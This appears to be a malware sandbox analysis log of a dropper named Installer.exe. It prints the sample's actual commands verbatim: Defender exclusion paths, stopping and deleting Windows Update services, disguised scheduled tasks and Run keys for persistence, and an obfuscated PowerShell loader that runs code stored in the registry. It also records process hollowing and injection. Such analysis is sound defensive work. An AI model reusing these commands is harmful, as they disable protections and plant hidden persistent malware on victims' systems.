Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force			Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Section unmapped: C:\Windows\GoogleUpdate.exe base address: F80000			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: C:\Windows\System32\dllhost.exe base address: 140000000

Writes to foreign memory regions

Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Memory written: C:\Windows\System32\dialer.exe base: AECD1AC010	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Memory written: C:\Windows\GoogleUpdate.exe base: F80000	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Memory written: C:\Windows\GoogleUpdate.exe base: F81000	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Memory written: C:\Windows\GoogleUpdate.exe base: F91000	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 1500000	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 1502000	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 150F000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14000F000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14001A000

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe

Thread register set: target process: 3376

Jump to behavior

Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ecgxrz#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#wajvhwink#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { schtasks /run /tn "googleupdatetaskmachineqc" } else { "c:\program files\google\chrome\updater.exe" }
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe ".(\"{1}{0}\" -f 'et','s') (\"6t\"+\"o\") ([type](\"{2}{0}{4}{1}{3}\" -f'e','mbl','refl','y','ction.asse') ) ; $dlr4s = [type](\"{3}{1}{2}{4}{0}\"-f'ry','osoft.w','in32.r','micr','egist') ; $6to::(\"{0}{1}\" -f 'l','oad').invoke( (.(\"{1}{2}{0}\" -f 't-item','g','e') (\"vari\"+\"ab\"+\"le\"+\":dlr4s\") ).\"va`lue\"::\"loc`alm`achine\".(\"{2}{1}{0}\" -f 'ey','ubk','opens').invoke((\"{1}{0}\"-f'e','softwar')).(\"{1}{0}{2}\" -f'u','getval','e').invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"ent`ryp`oint\".\"in`voke\"(${n`ull},${n`ull})"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe ".(\"{1}{0}\" -f 'et','s') (\"6t\"+\"o\") ([type](\"{2}{0}{4}{1}{3}\" -f'e','mbl','refl','y','ction.asse') ) ; $dlr4s = [type](\"{3}{1}{2}{4}{0}\"-f'ry','osoft.w','in32.r','micr','egist') ; $6to::(\"{0}{1}\" -f 'l','oad').invoke( (.(\"{1}{2}{0}\" -f 't-item','g','e') (\"vari\"+\"ab\"+\"le\"+\":dlr4s\") ).\"va`lue\"::\"loc`alm`achine\".(\"{2}{1}{0}\" -f 'ey','ubk','opens').invoke((\"{1}{0}\"-f'e','softwar')).(\"{1}{0}{2}\" -f'u','getval','e').invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"ent`ryp`oint\".\"in`voke\"(${n`ull},${n`ull})"
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ecgxrz#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#wajvhwink#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { schtasks /run /tn "googleupdatetaskmachineqc" } else { "c:\program files\google\chrome\updater.exe" }	Jump to behavior

Source: C:\Users\user\Desktop\Installer.exe	Process created: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe "C:\Users\user\AppData\LocalLow\1u8JL0XE.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process created: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe "C:\Users\user\AppData\LocalLow\OBH7JYJN.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process created: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process created: C:\Users\user\AppData\LocalLow\MfU3390p.exe "C:\Users\user\AppData\LocalLow\MfU3390p.exe"	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Process created: C:\Windows\GoogleUpdate.exe C:\Windows\GoogleUpdate.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{946476e5-3894-42c2-b536-7341f926cc1f}

Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe

Code function: 42_2_00F213B0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,GetModuleFileNameA,GetCurrentProcess,IsWow64Process,CreateProcessA,Sleep,CloseHandle,CloseHandle,CloseHandle,RegDeleteKeyA,

42_2_00F213B0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
